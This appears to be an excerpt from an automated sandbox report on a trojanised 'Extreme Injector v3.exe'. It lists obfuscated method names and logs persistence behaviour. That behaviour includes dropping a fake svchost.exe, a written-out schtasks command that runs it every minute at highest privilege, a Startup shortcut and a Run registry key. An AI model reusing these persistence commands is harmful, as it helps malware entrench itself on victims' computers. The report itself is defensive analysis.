                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77D410 push ebp; iretd 11_2_00007FFD9B77D411
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77D090 push ebp; iretd 11_2_00007FFD9B77D091
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77D790 push ebp; iretd 11_2_00007FFD9B77D791
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77DB10 push ebp; iretd 11_2_00007FFD9B77DB11
                      Source: Extreme Injector v3.exe, 2tvp9ITKtQDpTk.csHigh entropy of concatenated method names: 'pWljicVxbCThX4', 'bkbFaJoVH24uos', 'NfkC7hH3hKFQkZ', 'ycIUWuM2oLhCOzbad35ssBMPRvE5ylVqya6IzXKvFnJtCey', 'l1h8cfwZxgIa9G17TQgMQBMCUKc5RUewIDzBWrejeRMIrDP', 'ymYrB86QkROIpuU9gJ8BfU0LpFzwtJEstDQ9MpFLwJRuXLK', 'uCX4LHDOfMz61tWV5Zu3gpJz4m4dflA4kqEN0PvJLqkDO1S', 'SA3OEhUXH7nclp9mwJeGaV7Leims5WdmszoMytoQTV5nz1E', 'pT1qG71qU6WvodMfusR5NSuLyw8owlSlPvEy5BGSr3KEJjq', 'URgIIvIa643U7kFk4kPGA3CDmiMKCzF53Bm3zcqdOtEOeXg'
                      Source: Extreme Injector v3.exe, 5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.csHigh entropy of concatenated method names: 'Pv0Uv7ZYBNwgbDdFPqq8v1ta8olYY', 'CZ04ba3T3IYK0M1Pcv4AazfVN8B2g', 'FFGhyij4eCf1IKOEAKu446qWLkdEb', 'B90L9ijhGAEXdV3XHv3cgGCAVyuTA', 'AJb40AsHeiB6YvewWBDBbeFQtqFHd', 'sRYLJGOHessVxux9icpXamZoWzCcY', 'V3YmDYzvIvseYcKZItuzRiThpmo9K', 'gO6MtryZPWkEAnEkDsi01Fyb0s81J', 'dZlR9pT68b67piHgU0rDTPsNlrwbZ', 'OWHQjSBYR36RB99i3dlEfdgw8Peni'
                      Source: Extreme Injector v3.exe, rSpjjO8oUvCMcKvoevjeljS9Yghyz.csHigh entropy of concatenated method names: 'XqPvliaaW4ZuWbaKXpWRwzRCdEKmF', 'M33X6VISXUkeDPSGqsDK1LxRRzTq3', 'apWfloInmyMykiVHs0B2ZIk6DIKgg', 'zaDvWFzsQvLPmJH1DusWI6iZZca1N', 'J2pDkTvuKJPALMCjFjIFMYdZg7vKp', 'vJsbAh6jqDXXtQQI875zuhIwPVHBj', 'rsjjZ00AvYTuUUtq3m7kIPbH4hLh9', 'ypfpx3KRYSjwBXKmfLd6vWOyuxWhJ', '_7oFybmPqVjyL6l5IdZYOSEgKlyQZD', 'EvrMC2Ci4BHuOoSv1BvgqAx3g67os'
                      Source: Extreme Injector v3.exe, 3PBEeO1MD7801VZTmLM4yToFRXenF.csHigh entropy of concatenated method names: 'CBdo8AiypmQ5KYQPUyaxTIKiqGNkU', 'YKr7sAb5eXUVfwdayb5ZS79THz5BA', 'JYhsGeGrDsnKMfZLXR04xlaaSyhEw', 'cP3KbRtvcCaZiwvPkPwXm2ytO3P5E', '_1bjTzfqpC4EZStLrLxfumi0MywDQO', 'rG8MeE2zsg0eqOz5T4T7oMaItx5X2', 'bzcBAIkbT7YOQP0AxRYMPcMOMJguN', 'AHGNqg8NmW3mxAtaU3UikiaiyrCRK', 'zZqgjl5L0COZ5DkAvLWfzIygibxdU', 'nSoW0XY7ec6C2KaCpXE02bLHgpy2B'
                      Source: Extreme Injector v3.exe, oN8SqtbHGq18HI8XT15gdwPNldMUG.csHigh entropy of concatenated method names: 'A573LW1MK3L0EdHEnXVDwMEmSK6Yv', '_1gFPUUV95a9xMqH1ikYx4AbtE551K', 'd9B3OlPKQWnMR9m9dq0LPB9V9pHmj', 'Id9P7SABv2Vj6ICf2GEU23IHQjBqk', '_6PaQgAwfqJxTHy', 'rk7KR8S54c16Pf', '_627eHcWKJzD15z', 'XBFht0NEeEAfrm', 'YZie9MJEJLqxVh', 'NBFnHwN38Z3wns'
                      Source: Extreme Injector v3.exe, 5z67b4zUwaB1KqacPX9PFQGvID3lxPJfRYFRe69g4yqaWO5Fh8iFVI1Wh6N7MkBxSxPCEaWNUjtkxVzNZB1M6Rp.csHigh entropy of concatenated method names: 'Jwkvtg1FzMHLNNhREqtwI8Zn0Q7YYy6ayDvt4hPq7y2hZhTofB9HkAvbuBQE5zCDBVpoBDedP1TV3WeeP5rYTCZ', 'm1Yxfgo5KZ9q1u63dPbuEwLgpm7ERW6yXnj7Jh5jEzUwIwnukrwlt6Cbi1Z0mFkw3boyM3J51HPBJhuI05QHt1O', 'A9X93YsvhnonzVmmRtUDMzeI1nLJjWUQQmoSLfvIVYhLvAWq2XkagFyTYX9rHmvFXZh6VUpMI6hivM4KklU3Chj', 'LBRDXBExcyanjdKDBJJVQQpuJL2pMk6P0vEHjy575rKjbW1kL4qiVYmWVqBNzLVFDweqvGT7UMapmIELN6PtPBc', 'nDRslV1RaJxmLkLFn34RNT9g4cXFXn61JeF5YsxtkriDSlBzdP7gQsPxpJl4lGDdiMxn1o4LLfynMOpN4yWZ6Y1', 'bStkonBexKpUKlE451DsCYdHDnheMiLkK4fq9sU64zq4s5jCRAtZQLOl27lgfgzzBnHERcdGMHFiAVpCB4SCVju', 'Ale9L2Z1X61w7Br1bQBbNtQbkWlSVjEif0ZIx00f3RHz1rIgLhOQKFWM3gKinq6DPhRPPPrrvj2PqjMKN1CFsT8', 'qErANfptKdUlX7ATylDkSKyENpAClEjim4sxaYKZnYbdcS6Kx2Z9OpR2G2erPihJrNnvtMsgVhZAYGRLVI8hY0T', 'xvE27X9IklOJ0W6ZpXGd0blvS8WGnhoa7vt6CdCtqSHsNehIjsvcTs6lkGsvec5KZ163luWKFwyq0faq27aZhhv', 'qMJPBRzcXQi2QR6WiYkX3jnOtQGP2iAEuTsQBagVKs98L2O21S9RWQPeW9jfbqB5yMGRdwGx077cO4rQ6AmSq4p'
                      Source: svchost.exe.0.dr, 2tvp9ITKtQDpTk.csHigh entropy of concatenated method names: 'pWljicVxbCThX4', 'bkbFaJoVH24uos', 'NfkC7hH3hKFQkZ', 'ycIUWuM2oLhCOzbad35ssBMPRvE5ylVqya6IzXKvFnJtCey', 'l1h8cfwZxgIa9G17TQgMQBMCUKc5RUewIDzBWrejeRMIrDP', 'ymYrB86QkROIpuU9gJ8BfU0LpFzwtJEstDQ9MpFLwJRuXLK', 'uCX4LHDOfMz61tWV5Zu3gpJz4m4dflA4kqEN0PvJLqkDO1S', 'SA3OEhUXH7nclp9mwJeGaV7Leims5WdmszoMytoQTV5nz1E', 'pT1qG71qU6WvodMfusR5NSuLyw8owlSlPvEy5BGSr3KEJjq', 'URgIIvIa643U7kFk4kPGA3CDmiMKCzF53Bm3zcqdOtEOeXg'
                      Source: svchost.exe.0.dr, 5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.csHigh entropy of concatenated method names: 'Pv0Uv7ZYBNwgbDdFPqq8v1ta8olYY', 'CZ04ba3T3IYK0M1Pcv4AazfVN8B2g', 'FFGhyij4eCf1IKOEAKu446qWLkdEb', 'B90L9ijhGAEXdV3XHv3cgGCAVyuTA', 'AJb40AsHeiB6YvewWBDBbeFQtqFHd', 'sRYLJGOHessVxux9icpXamZoWzCcY', 'V3YmDYzvIvseYcKZItuzRiThpmo9K', 'gO6MtryZPWkEAnEkDsi01Fyb0s81J', 'dZlR9pT68b67piHgU0rDTPsNlrwbZ', 'OWHQjSBYR36RB99i3dlEfdgw8Peni'
                      Source: svchost.exe.0.dr, rSpjjO8oUvCMcKvoevjeljS9Yghyz.csHigh entropy of concatenated method names: 'XqPvliaaW4ZuWbaKXpWRwzRCdEKmF', 'M33X6VISXUkeDPSGqsDK1LxRRzTq3', 'apWfloInmyMykiVHs0B2ZIk6DIKgg', 'zaDvWFzsQvLPmJH1DusWI6iZZca1N', 'J2pDkTvuKJPALMCjFjIFMYdZg7vKp', 'vJsbAh6jqDXXtQQI875zuhIwPVHBj', 'rsjjZ00AvYTuUUtq3m7kIPbH4hLh9', 'ypfpx3KRYSjwBXKmfLd6vWOyuxWhJ', '_7oFybmPqVjyL6l5IdZYOSEgKlyQZD', 'EvrMC2Ci4BHuOoSv1BvgqAx3g67os'
                      Source: svchost.exe.0.dr, 3PBEeO1MD7801VZTmLM4yToFRXenF.csHigh entropy of concatenated method names: 'CBdo8AiypmQ5KYQPUyaxTIKiqGNkU', 'YKr7sAb5eXUVfwdayb5ZS79THz5BA', 'JYhsGeGrDsnKMfZLXR04xlaaSyhEw', 'cP3KbRtvcCaZiwvPkPwXm2ytO3P5E', '_1bjTzfqpC4EZStLrLxfumi0MywDQO', 'rG8MeE2zsg0eqOz5T4T7oMaItx5X2', 'bzcBAIkbT7YOQP0AxRYMPcMOMJguN', 'AHGNqg8NmW3mxAtaU3UikiaiyrCRK', 'zZqgjl5L0COZ5DkAvLWfzIygibxdU', 'nSoW0XY7ec6C2KaCpXE02bLHgpy2B'
                      Source: svchost.exe.0.dr, oN8SqtbHGq18HI8XT15gdwPNldMUG.csHigh entropy of concatenated method names: 'A573LW1MK3L0EdHEnXVDwMEmSK6Yv', '_1gFPUUV95a9xMqH1ikYx4AbtE551K', 'd9B3OlPKQWnMR9m9dq0LPB9V9pHmj', 'Id9P7SABv2Vj6ICf2GEU23IHQjBqk', '_6PaQgAwfqJxTHy', 'rk7KR8S54c16Pf', '_627eHcWKJzD15z', 'XBFht0NEeEAfrm', 'YZie9MJEJLqxVh', 'NBFnHwN38Z3wns'
                      Source: svchost.exe.0.dr, 5z67b4zUwaB1KqacPX9PFQGvID3lxPJfRYFRe69g4yqaWO5Fh8iFVI1Wh6N7MkBxSxPCEaWNUjtkxVzNZB1M6Rp.csHigh entropy of concatenated method names: 'Jwkvtg1FzMHLNNhREqtwI8Zn0Q7YYy6ayDvt4hPq7y2hZhTofB9HkAvbuBQE5zCDBVpoBDedP1TV3WeeP5rYTCZ', 'm1Yxfgo5KZ9q1u63dPbuEwLgpm7ERW6yXnj7Jh5jEzUwIwnukrwlt6Cbi1Z0mFkw3boyM3J51HPBJhuI05QHt1O', 'A9X93YsvhnonzVmmRtUDMzeI1nLJjWUQQmoSLfvIVYhLvAWq2XkagFyTYX9rHmvFXZh6VUpMI6hivM4KklU3Chj', 'LBRDXBExcyanjdKDBJJVQQpuJL2pMk6P0vEHjy575rKjbW1kL4qiVYmWVqBNzLVFDweqvGT7UMapmIELN6PtPBc', 'nDRslV1RaJxmLkLFn34RNT9g4cXFXn61JeF5YsxtkriDSlBzdP7gQsPxpJl4lGDdiMxn1o4LLfynMOpN4yWZ6Y1', 'bStkonBexKpUKlE451DsCYdHDnheMiLkK4fq9sU64zq4s5jCRAtZQLOl27lgfgzzBnHERcdGMHFiAVpCB4SCVju', 'Ale9L2Z1X61w7Br1bQBbNtQbkWlSVjEif0ZIx00f3RHz1rIgLhOQKFWM3gKinq6DPhRPPPrrvj2PqjMKN1CFsT8', 'qErANfptKdUlX7ATylDkSKyENpAClEjim4sxaYKZnYbdcS6Kx2Z9OpR2G2erPihJrNnvtMsgVhZAYGRLVI8hY0T', 'xvE27X9IklOJ0W6ZpXGd0blvS8WGnhoa7vt6CdCtqSHsNehIjsvcTs6lkGsvec5KZ163luWKFwyq0faq27aZhhv', 'qMJPBRzcXQi2QR6WiYkX3jnOtQGP2iAEuTsQBagVKs98L2O21S9RWQPeW9jfbqB5yMGRdwGx077cO4rQ6AmSq4p'
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, 2tvp9ITKtQDpTk.csHigh entropy of concatenated method names: 'pWljicVxbCThX4', 'bkbFaJoVH24uos', 'NfkC7hH3hKFQkZ', 'ycIUWuM2oLhCOzbad35ssBMPRvE5ylVqya6IzXKvFnJtCey', 'l1h8cfwZxgIa9G17TQgMQBMCUKc5RUewIDzBWrejeRMIrDP', 'ymYrB86QkROIpuU9gJ8BfU0LpFzwtJEstDQ9MpFLwJRuXLK', 'uCX4LHDOfMz61tWV5Zu3gpJz4m4dflA4kqEN0PvJLqkDO1S', 'SA3OEhUXH7nclp9mwJeGaV7Leims5WdmszoMytoQTV5nz1E', 'pT1qG71qU6WvodMfusR5NSuLyw8owlSlPvEy5BGSr3KEJjq', 'URgIIvIa643U7kFk4kPGA3CDmiMKCzF53Bm3zcqdOtEOeXg'
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, 5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.csHigh entropy of concatenated method names: 'Pv0Uv7ZYBNwgbDdFPqq8v1ta8olYY', 'CZ04ba3T3IYK0M1Pcv4AazfVN8B2g', 'FFGhyij4eCf1IKOEAKu446qWLkdEb', 'B90L9ijhGAEXdV3XHv3cgGCAVyuTA', 'AJb40AsHeiB6YvewWBDBbeFQtqFHd', 'sRYLJGOHessVxux9icpXamZoWzCcY', 'V3YmDYzvIvseYcKZItuzRiThpmo9K', 'gO6MtryZPWkEAnEkDsi01Fyb0s81J', 'dZlR9pT68b67piHgU0rDTPsNlrwbZ', 'OWHQjSBYR36RB99i3dlEfdgw8Peni'
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, rSpjjO8oUvCMcKvoevjeljS9Yghyz.csHigh entropy of concatenated method names: 'XqPvliaaW4ZuWbaKXpWRwzRCdEKmF', 'M33X6VISXUkeDPSGqsDK1LxRRzTq3', 'apWfloInmyMykiVHs0B2ZIk6DIKgg', 'zaDvWFzsQvLPmJH1DusWI6iZZca1N', 'J2pDkTvuKJPALMCjFjIFMYdZg7vKp', 'vJsbAh6jqDXXtQQI875zuhIwPVHBj', 'rsjjZ00AvYTuUUtq3m7kIPbH4hLh9', 'ypfpx3KRYSjwBXKmfLd6vWOyuxWhJ', '_7oFybmPqVjyL6l5IdZYOSEgKlyQZD', 'EvrMC2Ci4BHuOoSv1BvgqAx3g67os'
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, 3PBEeO1MD7801VZTmLM4yToFRXenF.csHigh entropy of concatenated method names: 'CBdo8AiypmQ5KYQPUyaxTIKiqGNkU', 'YKr7sAb5eXUVfwdayb5ZS79THz5BA', 'JYhsGeGrDsnKMfZLXR04xlaaSyhEw', 'cP3KbRtvcCaZiwvPkPwXm2ytO3P5E', '_1bjTzfqpC4EZStLrLxfumi0MywDQO', 'rG8MeE2zsg0eqOz5T4T7oMaItx5X2', 'bzcBAIkbT7YOQP0AxRYMPcMOMJguN', 'AHGNqg8NmW3mxAtaU3UikiaiyrCRK', 'zZqgjl5L0COZ5DkAvLWfzIygibxdU', 'nSoW0XY7ec6C2KaCpXE02bLHgpy2B'
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, oN8SqtbHGq18HI8XT15gdwPNldMUG.csHigh entropy of concatenated method names: 'A573LW1MK3L0EdHEnXVDwMEmSK6Yv', '_1gFPUUV95a9xMqH1ikYx4AbtE551K', 'd9B3OlPKQWnMR9m9dq0LPB9V9pHmj', 'Id9P7SABv2Vj6ICf2GEU23IHQjBqk', '_6PaQgAwfqJxTHy', 'rk7KR8S54c16Pf', '_627eHcWKJzD15z', 'XBFht0NEeEAfrm', 'YZie9MJEJLqxVh', 'NBFnHwN38Z3wns'
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, 5z67b4zUwaB1KqacPX9PFQGvID3lxPJfRYFRe69g4yqaWO5Fh8iFVI1Wh6N7MkBxSxPCEaWNUjtkxVzNZB1M6Rp.csHigh entropy of concatenated method names: 'Jwkvtg1FzMHLNNhREqtwI8Zn0Q7YYy6ayDvt4hPq7y2hZhTofB9HkAvbuBQE5zCDBVpoBDedP1TV3WeeP5rYTCZ', 'm1Yxfgo5KZ9q1u63dPbuEwLgpm7ERW6yXnj7Jh5jEzUwIwnukrwlt6Cbi1Z0mFkw3boyM3J51HPBJhuI05QHt1O', 'A9X93YsvhnonzVmmRtUDMzeI1nLJjWUQQmoSLfvIVYhLvAWq2XkagFyTYX9rHmvFXZh6VUpMI6hivM4KklU3Chj', 'LBRDXBExcyanjdKDBJJVQQpuJL2pMk6P0vEHjy575rKjbW1kL4qiVYmWVqBNzLVFDweqvGT7UMapmIELN6PtPBc', 'nDRslV1RaJxmLkLFn34RNT9g4cXFXn61JeF5YsxtkriDSlBzdP7gQsPxpJl4lGDdiMxn1o4LLfynMOpN4yWZ6Y1', 'bStkonBexKpUKlE451DsCYdHDnheMiLkK4fq9sU64zq4s5jCRAtZQLOl27lgfgzzBnHERcdGMHFiAVpCB4SCVju', 'Ale9L2Z1X61w7Br1bQBbNtQbkWlSVjEif0ZIx00f3RHz1rIgLhOQKFWM3gKinq6DPhRPPPrrvj2PqjMKN1CFsT8', 'qErANfptKdUlX7ATylDkSKyENpAClEjim4sxaYKZnYbdcS6Kx2Z9OpR2G2erPihJrNnvtMsgVhZAYGRLVI8hY0T', 'xvE27X9IklOJ0W6ZpXGd0blvS8WGnhoa7vt6CdCtqSHsNehIjsvcTs6lkGsvec5KZ163luWKFwyq0faq27aZhhv', 'qMJPBRzcXQi2QR6WiYkX3jnOtQGP2iAEuTsQBagVKs98L2O21S9RWQPeW9jfbqB5yMGRdwGx077cO4rQ6AmSq4p'

                      Persistence and Installation Behavior

                      barindex
                      Drops PE files with benign system names
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
